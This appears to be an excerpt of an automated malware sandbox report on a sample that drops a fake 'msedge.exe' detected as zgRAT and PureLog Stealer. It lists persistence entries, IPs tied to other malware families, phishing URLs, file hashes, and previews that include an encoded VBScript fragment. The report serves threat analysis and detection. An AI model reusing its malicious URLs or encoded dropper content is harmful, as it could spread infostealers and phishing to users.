                                                                                                                                                    HCA Information:Failed
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 1536 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 2120 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 2864 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 6492 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 6780 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 1504 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 2840 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 516 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 6088 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 6632 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 7120 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4064 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7116 because it is empty
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • VT rate limit hit for: gh3zRWl4or.exe
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    12:19:14API Interceptor3x Sleep call for process: RegAsm.exe modified
                                                                                                                                                    13:56:08API Interceptor51x Sleep call for process: powershell.exe modified
                                                                                                                                                    13:56:22API Interceptor1x Sleep call for process: LBUPSPkYsNXrxZEtdVzCng.exe modified
                                                                                                                                                    13:56:46API Interceptor1x Sleep call for process: msedge.exe modified
                                                                                                                                                    19:56:06Task SchedulerRun new task: LBUPSPkYsNXrxZEtdVzCng path: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                    19:56:07Task SchedulerRun new task: LBUPSPkYsNXrxZEtdVzCngL path: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                    19:56:07Task SchedulerRun new task: msedge path: "C:\Edge\msedge.exe"
                                                                                                                                                    19:56:07Task SchedulerRun new task: msedgem path: "C:\Edge\msedge.exe"
                                                                                                                                                    19:56:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                    19:56:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                    19:56:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                    19:56:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                    19:56:43AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                    19:56:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                    19:57:10AutostartRun: WinLogon Shell "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                    19:57:18AutostartRun: WinLogon Shell "C:\Edge\msedge.exe"
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    188.114.96.3docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                    https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                    http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                    http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                    http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                    • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.chinaen.org/zi4g/
                                                                                                                                                    http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                                                                                                                                    • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                                                                                                                                    Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • www.444317.com/
                                                                                                                                                    Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                                                                    • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                                                                                                                    1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                    • dddotx.shop/Mine/PWS/fre.php
                                                                                                                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zipGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    https://downcheck.nyc3.cdn.digitaloceanspaces.com/malt.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    CLOUDFLARENETUSdocs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.18.35.212
                                                                                                                                                    https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.22.52.71
                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 1.1.1.1
                                                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 172.67.148.87
                                                                                                                                                    http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.18.86.42
                                                                                                                                                    AKAMAI-ASUShttps://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.102.35.2
                                                                                                                                                    http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 173.223.116.167
                                                                                                                                                    Xkci1BfrmX.lnkGet hashmaliciousLonePageBrowse
                                                                                                                                                    • 23.56.162.185
                                                                                                                                                    Snc2ZNvAZP.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 23.56.162.185
                                                                                                                                                    Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 23.56.162.185
                                                                                                                                                    SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 96.17.64.189
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    74954a0c86284d0d6e1c4efefe92b521file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    Setup_10024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    U4hM4c3l4m.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    f1w58Se3jL.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    6EFA6YABDc.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    1ehTzqaTXV.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    Document.pdf.lnkGet hashmaliciousBitter ElephantBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    Transmission Cost Database 2.0.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.102.49.254
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\user\Desktop\ASIzYbXK.log0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                      e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                        p3f932IsTO.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                          UpU2O6YQxG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                            5WbBcHi91R.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                              4LU843t3Vt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                ggJWCFp2S3.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                  yQrCGtNgsf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    qDlkXj5kcZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      C0laqZmkEf.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (335), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):335
                                                                                                                                                                        Entropy (8bit):5.753518905515784
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:W4C/CQ9D6pyJVa6+yUvc+2VZLT6EleNKtyYmu72arytron5W/3hoSoTxOUpc3mln:cZJVj6d2Vp4NKt+02auFonk32nxn
                                                                                                                                                                        MD5:34226EAAA6D4DB0699352201E96F8DEC
                                                                                                                                                                        SHA1:D7F2A3B2C0EC7DD524828E709C189FE550BA0700
                                                                                                                                                                        SHA-256:BE237C4285155A6E67DF295BC4D0C590D4FBD4BD96A2D484DA188A3C984EA418
                                                                                                                                                                        SHA-512:D4747FDC3D522C360FE30C482CAF1704993018A71417CE58B0611FEC736ACC0A124E69C02D562D4D1F408D53CD2C12DDED789A3FF40ADDFFA92F64149206FFF1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:5fZD3ggYQiHgBoraZJp0sBv5v8tc5kTrjNhfpeQ4JfvCdeMEktzeMlm3ueS5wDdqOa6yGMu53vrMQtbRvp1Luyf8lovLMUHFCExDhY7Y94la4ZnBCBJHLR5Z58McbisiomKL5YtXrdM0NEDLAtJLL93uJXIjLe7aLDwSPbFnRvasEEM04BcrZhWosZChQKMMgwpJSv5jof3aiKqELRoJCQAnqHj0YhXHiOMSZCiJG3C4n6Fis8W8gDJQvCdKLEKHHw1U8XoIseDJNG9tBBHaKYkfE6gXjX7Bs5w1FvjVTOPB99CpCtJK6t6sLVPC1RiVgCaRTIoQbwG6Ijg
                                                                                                                                                                        Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):229
                                                                                                                                                                        Entropy (8bit):5.838240404374592
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
                                                                                                                                                                        MD5:569A28CF34F3A51DB0CC4AA0369773EC
                                                                                                                                                                        SHA1:23488377EA3A37B61750952D541B867AB3D8B424
                                                                                                                                                                        SHA-256:86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
                                                                                                                                                                        SHA-512:3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.
                                                                                                                                                                        Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):70
                                                                                                                                                                        Entropy (8bit):4.968079981014333
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
                                                                                                                                                                        MD5:68B1414DBD5A51F2F75912513D1A035E
                                                                                                                                                                        SHA1:A45E03F8EDADA7FDF3697EAA6D88785CD464D373
                                                                                                                                                                        SHA-256:48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
                                                                                                                                                                        SHA-512:AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%
                                                                                                                                                                        Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1963008
                                                                                                                                                                        Entropy (8bit):7.552676792704024
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                        MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                        SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                        SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1168
                                                                                                                                                                        Entropy (8bit):4.448520842480604
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                                                                        MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                                                                        SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                                                                        SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                                                                                        SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4608
                                                                                                                                                                        Entropy (8bit):3.9368005565809114
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:6nmhtgWxZ8RxeOAkFJOcV4MKe28dfEc3s0RvqBH7uulB+hnqXSfbNtm:DCXxvxVx9slwvktTkZzNt
                                                                                                                                                                        MD5:F071F47F6CD476AC97E8B525A1EA1F0D
                                                                                                                                                                        SHA1:2F3A3F02D4DED8CF21C4A06A6D6FEA9F63943DFD
                                                                                                                                                                        SHA-256:8E6A161C417CB75D31384F83A907CE9720D1EBD3958084F64F483460EF26FC31
                                                                                                                                                                        SHA-512:A8EF3A26346CBDD6CAAC4146BEE642341722064CE282323AC2F516B01D58AFA02FEFFF9AE6C87DCC178531F22ECA16133ED828A2880CE797A0A5CE2501193834
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...(... ...#Blob...........WU........%3................................................................
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (892), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):892
                                                                                                                                                                        Entropy (8bit):5.902085913543657
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:XfLs9BXBzY2iE2y6Fn4v/mbTlT4hL43YCMpWyHoBOk:XDs9nYQIFaWq6yHoAk
                                                                                                                                                                        MD5:274A882DA1EABE7085863D16F9D9515B
                                                                                                                                                                        SHA1:F62484DB672BE6479C095DA961EE1F2DE5D65864
                                                                                                                                                                        SHA-256:1125423D22D320B20F36FACB69DDF1703048602FEEB3A293BEABAB62C083A3D7
                                                                                                                                                                        SHA-512:44DE8C74842D917EC7DB6F24109393D5197C19A7C9C45048E5E69985902AFBF26C41F7384E4CE8D51FF78C8CABC26219771D2C2CE164AE40ACE11059D0DA8D8C
                                                                                                                                                                        Malicious:false
